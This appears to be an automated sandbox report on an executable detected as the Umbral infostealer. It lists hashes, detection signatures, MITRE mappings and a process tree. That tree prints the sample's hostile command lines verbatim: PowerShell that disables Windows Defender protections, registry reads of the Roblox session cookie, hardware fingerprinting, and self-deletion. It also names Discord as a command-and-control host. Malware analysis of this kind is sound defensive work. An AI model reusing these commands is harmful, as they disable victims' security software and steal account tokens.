Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
01-02-2025 21:02
Behavioral task
behavioral1
Sample
Nebula Executor.exe
Resource
win7-20240903-en
General
-
Target
Nebula Executor.exe
-
Size
311KB
-
MD5
d8f0449ae074e8752ec44bb5c000f0b2
-
SHA1
a56a5838c50a83d35c0e49909f225408014a1a78
-
SHA256
2322d185fb947885fcdd2b3a5ef43453b3318f5b997f07b6b9cb9c1865f21b6e
-
SHA512
488bfc856814dc453b9fd5d79d4dfeeeefef85711ef2fc967881fa407ba3d332e5ca8ba557ca71796c786c14d3f9f2c2145d65c508b44dc304aa38b9763378ea
-
SSDEEP
6144:XloZM+rIkd8g+EtXHkv/iD40TTIywvrYjhkijD6CO1b8e1m64iPpGErmx4OmoW:1oZtL+EP80TTIywvrYjhkijD6zzBPpN5
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2036-1-0x0000000001170000-0x00000000011C4000-memory.dmp family_umbral -
Umbral family
-
pid Process 1492 powershell.exe 2560 powershell.exe 1440 powershell.exe 2244 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Nebula Executor.exe -
Deletes itself 1 IoCs
pid Process 2008 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2008 cmd.exe 1484 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 704 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1484 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2036 Nebula Executor.exe 2244 powershell.exe 1492 powershell.exe 2560 powershell.exe 1976 powershell.exe 1440 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2036 Nebula Executor.exe Token: SeIncreaseQuotaPrivilege 2784 wmic.exe Token: SeSecurityPrivilege 2784 wmic.exe Token: SeTakeOwnershipPrivilege 2784 wmic.exe Token: SeLoadDriverPrivilege 2784 wmic.exe Token: SeSystemProfilePrivilege 2784 wmic.exe Token: SeSystemtimePrivilege 2784 wmic.exe Token: SeProfSingleProcessPrivilege 2784 wmic.exe Token: SeIncBasePriorityPrivilege 2784 wmic.exe Token: SeCreatePagefilePrivilege 2784 wmic.exe Token: SeBackupPrivilege 2784 wmic.exe Token: SeRestorePrivilege 2784 wmic.exe Token: SeShutdownPrivilege 2784 wmic.exe Token: SeDebugPrivilege 2784 wmic.exe Token: SeSystemEnvironmentPrivilege 2784 wmic.exe Token: SeRemoteShutdownPrivilege 2784 wmic.exe Token: SeUndockPrivilege 2784 wmic.exe Token: SeManageVolumePrivilege 2784 wmic.exe Token: 33 2784 wmic.exe Token: 34 2784 wmic.exe Token: 35 2784 wmic.exe Token: SeIncreaseQuotaPrivilege 2784 wmic.exe Token: SeSecurityPrivilege 2784 wmic.exe Token: SeTakeOwnershipPrivilege 2784 wmic.exe Token: SeLoadDriverPrivilege 2784 wmic.exe Token: SeSystemProfilePrivilege 2784 wmic.exe Token: SeSystemtimePrivilege 2784 wmic.exe Token: SeProfSingleProcessPrivilege 2784 wmic.exe Token: SeIncBasePriorityPrivilege 2784 wmic.exe Token: SeCreatePagefilePrivilege 2784 wmic.exe Token: SeBackupPrivilege 2784 wmic.exe Token: SeRestorePrivilege 2784 wmic.exe Token: SeShutdownPrivilege 2784 wmic.exe Token: SeDebugPrivilege 2784 wmic.exe Token: SeSystemEnvironmentPrivilege 2784 wmic.exe Token: SeRemoteShutdownPrivilege 2784 wmic.exe Token: SeUndockPrivilege 2784 wmic.exe Token: SeManageVolumePrivilege 2784 wmic.exe Token: 33 2784 wmic.exe Token: 34 2784 wmic.exe Token: 35 2784 wmic.exe Token: SeDebugPrivilege 2244 powershell.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 2560 powershell.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeIncreaseQuotaPrivilege 1332 wmic.exe Token: SeSecurityPrivilege 1332 wmic.exe Token: SeTakeOwnershipPrivilege 1332 wmic.exe Token: SeLoadDriverPrivilege 1332 wmic.exe Token: SeSystemProfilePrivilege 1332 wmic.exe Token: SeSystemtimePrivilege 1332 wmic.exe Token: SeProfSingleProcessPrivilege 1332 wmic.exe Token: SeIncBasePriorityPrivilege 1332 wmic.exe Token: SeCreatePagefilePrivilege 1332 wmic.exe Token: SeBackupPrivilege 1332 wmic.exe Token: SeRestorePrivilege 1332 wmic.exe Token: SeShutdownPrivilege 1332 wmic.exe Token: SeDebugPrivilege 1332 wmic.exe Token: SeSystemEnvironmentPrivilege 1332 wmic.exe Token: SeRemoteShutdownPrivilege 1332 wmic.exe Token: SeUndockPrivilege 1332 wmic.exe Token: SeManageVolumePrivilege 1332 wmic.exe Token: 33 1332 wmic.exe Token: 34 1332 wmic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2036 wrote to memory of 2784 2036 Nebula Executor.exe 30 PID 2036 wrote to memory of 2784 2036 Nebula Executor.exe 30 PID 2036 wrote to memory of 2784 2036 Nebula Executor.exe 30 PID 2036 wrote to memory of 2212 2036 Nebula Executor.exe 33 PID 2036 wrote to memory of 2212 2036 Nebula Executor.exe 33 PID 2036 wrote to memory of 2212 2036 Nebula Executor.exe 33 PID 2036 wrote to memory of 2244 2036 Nebula Executor.exe 35 PID 2036 wrote to memory of 2244 2036 Nebula Executor.exe 35 PID 2036 wrote to memory of 2244 2036 Nebula Executor.exe 35 PID 2036 wrote to memory of 1492 2036 Nebula Executor.exe 37 PID 2036 wrote to memory of 1492 2036 Nebula Executor.exe 37 PID 2036 wrote to memory of 1492 2036 Nebula Executor.exe 37 PID 2036 wrote to memory of 2560 2036 Nebula Executor.exe 39 PID 2036 wrote to memory of 2560 2036 Nebula Executor.exe 39 PID 2036 wrote to memory of 2560 2036 Nebula Executor.exe 39 PID 2036 wrote to memory of 1976 2036 Nebula Executor.exe 41 PID 2036 wrote to memory of 1976 2036 Nebula Executor.exe 41 PID 2036 wrote to memory of 1976 2036 Nebula Executor.exe 41 PID 2036 wrote to memory of 1332 2036 Nebula Executor.exe 43 PID 2036 wrote to memory of 1332 2036 Nebula Executor.exe 43 PID 2036 wrote to memory of 1332 2036 Nebula Executor.exe 43 PID 2036 wrote to memory of 1312 2036 Nebula Executor.exe 45 PID 2036 wrote to memory of 1312 2036 Nebula Executor.exe 45 PID 2036 wrote to memory of 1312 2036 Nebula Executor.exe 45 PID 2036 wrote to memory of 1524 2036 Nebula Executor.exe 47 PID 2036 wrote to memory of 1524 2036 Nebula Executor.exe 47 PID 2036 wrote to memory of 1524 2036 Nebula Executor.exe 47 PID 2036 wrote to memory of 1440 2036 Nebula Executor.exe 49 PID 2036 wrote to memory of 1440 2036 Nebula Executor.exe 49 PID 2036 wrote to memory of 1440 2036 Nebula Executor.exe 49 PID 2036 wrote to memory of 704 2036 Nebula Executor.exe 51 PID 2036 wrote to memory of 704 2036 Nebula Executor.exe 51 PID 2036 wrote to memory of 704 2036 Nebula Executor.exe 51 PID 2036 wrote to memory of 2008 2036 Nebula Executor.exe 53 PID 2036 wrote to memory of 2008 2036 Nebula Executor.exe 53 PID 2036 wrote to memory of 2008 2036 Nebula Executor.exe 53 PID 2008 wrote to memory of 1484 2008 cmd.exe 55 PID 2008 wrote to memory of 1484 2008 cmd.exe 55 PID 2008 wrote to memory of 1484 2008 cmd.exe 55 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2212 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Nebula Executor.exe"C:\Users\Admin\AppData\Local\Temp\Nebula Executor.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Nebula Executor.exe"2⤵
- Views/modifies file attributes
PID:2212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nebula Executor.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:1312
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1440
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:704
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Nebula Executor.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1484
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55b64015c8e39ef2a7715178a7deea646
SHA1077aa593469f41bdac6492b5374d95158ade011b
SHA2563f3ae850da54e80de1272cf45a18316954e2042559304a0eebeda9b9541c155c
SHA51296c9e3eb1bd11dfa91f0590f3211eaf8467b344cb54a1179c45dc0c448d0cd279eec8b2e414b131bb590700a8920207ac8d171718b0a796d536ce60c8fb4e8bb